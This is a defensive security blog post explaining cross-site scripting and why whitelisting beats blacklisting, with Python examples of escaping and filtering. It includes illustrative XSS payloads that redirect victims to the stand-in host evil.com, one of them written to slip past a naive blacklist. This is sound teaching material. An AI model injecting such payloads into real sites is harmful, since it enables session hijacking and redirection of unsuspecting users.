Dev Overflow – Part 9

By Mikhail Sudakov, Cyber Security Architect and Analyst, LEO Cyber Security.

Back to Part 8

Pictured above: an example XSS payload that would redirect a victim browsing a particular blog page to the given malicious site.

Yep, it is still here, and here to stay! What are we talking about today?

A7 – Cross-Site Scripting (XSS)

“XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.” – (OWASP). OWASP mentions that XSS is the second most prevalent issue in the Top 10 and is found in around two-thirds of all applications. Yeah, it’s that bad.

In Part 7 of this series, while discussing OWASP A5 – Broken Access Control, I mentioned the zero-trust model for software development. The model is actually quite basic: trust nothing, verify everything. Yet even some of the most experienced and security-conscious developers sometimes fail to abide by it. There can be other causes of XSS vulnerabilities in applications, but failure to live by this zero-trust rule is truly at the very heart of the issue.

First and foremost, let me stress that nothing (nothing!) running in the client's browser or coming from the client should be trusted. That's because the client can modify any and all content on any web page, including the JavaScript running in memory. An adversary can literally mold anything delivered to the client into something evil. It's that simple. Misfortune awaits the app that trustingly accepts user data from the client. Trust nothing or get wrecked!

The vast majority of applications take some information from their users in order to, well, do things for those users. A very common task is to take some arbitrary input from a user and then display it in some way, either back to that same user or to others as well. Think of a typical blogging application, for example, or even a complex social media platform like Facebook or Twitter. Now, consider the attempted XSS exploit shown at the very top.

If an application blindly takes that input and, without any escaping or sanitization, plops it into a database for future use, that would be a horrible blunder. I hope you can see that if that raw data were rendered into an HTML page inside a victim's browser, the browser's active window would immediately be redirected to… http://www.evil.com/git-rekt.php, which looks like it will land the poor unsuspecting user in a world of pain. So, that's obviously not good. Therefore, we must somehow "disarm" any data coming from the client that we will be using in some way. There are different terms for what I will be discussing next, but I'll stick to the common labels of black- versus whitelisting.
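Before getting to those, here is a minimal Python sketch of the blunder and of the "disarmed" alternative. The stored payload is my own stand-in for the input pictured at the top (an assumption, not the exact string), and the two rendering functions are hypothetical:

    import html

    # Hypothetical payload along the lines of the one pictured at the top of this post:
    # a stored blog comment that redirects the victim's browser when it is rendered.
    stored_comment = "<script>window.location='http://www.evil.com/git-rekt.php'</script>"

    def render_comment_unsafe(comment: str) -> str:
        # Vulnerable: raw, client-supplied data is dropped straight into the markup.
        return "<div class='comment'>" + comment + "</div>"

    def render_comment_escaped(comment: str) -> str:
        # Safer: HTML-encode the data so the browser treats it as text, not as code.
        return "<div class='comment'>" + html.escape(comment) + "</div>"

    print(render_comment_unsafe(stored_comment))   # the script would execute in the victim's browser
    print(render_comment_escaped(stored_comment))  # renders as harmless, visible text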

What is blacklisting? Think of Gandalf the Grey shouting at the Balrog: "You shall not PASS!" See that "<script>" sequence of characters in my input? That's got to go. So what we can naively do is write some logic that drops or encodes that specific sequence of bytes. That's all a blacklist is: a defined collection of "known" bad things we do not want to deal with. By definition, anything that is not explicitly on the blacklist passes.
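In Python, a naive blacklist along those lines might look like this (a sketch; the two patterns are my own illustrative choice, not an exhaustive list):

    import re

    # A naive blacklist: the "known bad" byte sequences we refuse to accept.
    BLACKLIST_PATTERNS = [r"<\s*script", r"<\s*/\s*script\s*>"]

    def blacklist_filter(user_input: str) -> str:
        # Strip only the patterns we explicitly listed; by definition,
        # anything that is not on the list passes through untouched.
        cleaned = user_input
        for pattern in BLACKLIST_PATTERNS:
            cleaned = re.sub(pattern, "", cleaned, flags=re.IGNORECASE)
        return cleaned

    print(blacklist_filter("<script>alert(1)</script>"))  # the listed patterns are stripped; ">alert(1)" remains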

Now, what is whitelisting? It is actually the exact opposite of blacklisting. Instead of specifying a list of known bad things, we specify a list of all known good things. Then we can take some kind of action against anything and everything that does not fit our whitelist of known good. A common action, for example, is to convert those bytes to something like HTML-encoded text. Another, less frequent, action is to drop those bytes completely (also sometimes called purging).
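Here is a whitelisting sketch in the same spirit. The allowed character set is an assumption I made purely for illustration; a real policy would depend on context:

    import re

    # An illustrative whitelist policy (assumed for this sketch): letters, digits,
    # whitespace, and a little basic punctuation are the only "known good" characters.
    WHITELIST = re.compile(r"[A-Za-z0-9\s.,!?'\-]")

    def whitelist_encode(user_input: str) -> str:
        # Anything outside the whitelist is converted to an HTML character reference.
        return "".join(
            ch if WHITELIST.fullmatch(ch) else "&#{};".format(ord(ch))
            for ch in user_input
        )

    def whitelist_purge(user_input: str) -> str:
        # The stricter option: drop (purge) anything that is not known good.
        return "".join(ch for ch in user_input if WHITELIST.fullmatch(ch))

    print(whitelist_encode("<script>alert(1)</script>"))  # angle brackets, slashes, parentheses become inert entities
    print(whitelist_purge("<script>alert(1)</script>"))   # only the whitelisted characters survive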

There are several schools of thought on this subject, but I believe it is generally agreed that blacklisting is definitely inferior to whitelisting. The only downside of whitelisting is that an unwanted action can be taken against a byte that is in fact benign because the whitelist is not up to date. The main downside of a blacklist is much worse: a previously unaccounted-for evil slips through because the blacklist is out of date or incomplete. And seriously, how can we be sure that we accounted for all unwanted patterns? We are humans, after all, and what humans do extremely and consistently well is make mistakes.
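To see that failure mode concretely, feed the naive blacklist from the earlier sketch a hypothetical payload it never accounted for:

    import re

    # The same naive "known bad" patterns from the blacklist sketch above.
    BLACKLIST_PATTERNS = [r"<\s*script", r"<\s*/\s*script\s*>"]

    # A hypothetical payload the blacklist never accounted for: no <script> tag anywhere,
    # yet it still redirects the victim's browser via an image tag's onerror handler.
    payload = "<img src=x onerror=\"window.location='http://www.evil.com/git-rekt.php'\">"

    filtered = payload
    for pattern in BLACKLIST_PATTERNS:
        filtered = re.sub(pattern, "", filtered, flags=re.IGNORECASE)

    print(filtered == payload)  # True -- the payload sailed through completely untouched

A whitelist, by contrast, would have HTML-encoded or purged those angle brackets without ever needing to "know" about this particular trick.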

Unsanitized data coming from the client can land us in a lot of trouble; it is what XSS thrives on. Security is a state of mind, and programmers who follow the zero-trust development model stand the best chance of defending their applications or modules from XSS vulnerabilities. It is definitely worth noting that most frameworks have good, dependable whitelisting and escaping capabilities, and it is often a blunder to use a "homebrewed" solution instead.
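As one example, assuming the Jinja2 templating library (which several Python web frameworks build on), letting the framework escape output for us looks like this:

    # A sketch using Jinja2 (one example of a library with dependable, built-in
    # escaping) rather than rolling our own filter.
    from jinja2 import Environment

    env = Environment(autoescape=True)  # let the framework do the escaping for us
    template = env.from_string("<div class='comment'>{{ comment }}</div>")

    print(template.render(comment="<script>alert(1)</script>"))
    # -> <div class='comment'>&lt;script&gt;alert(1)&lt;/script&gt;</div>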

In the next post, we will take a look at OWASP A8 – Insecure Deserialization.

Mikhail is a cybersecurity professional with an enormous passion for the field and thirst for knowledge. In addition to his day job, Mikhail is a professor of cryptology at St. Bonaventure University. A programmer specializing in software security and cryptology, Mikhail always seeks to expand his horizons, hone his skills, and take on new challenges. One day, he hopes to know enough to realize that he knows nothing. Mikhail holds an Offensive Security certification (OSCP) and, although he is a “Russian hacker”, his hat is white and his directive is to protect.
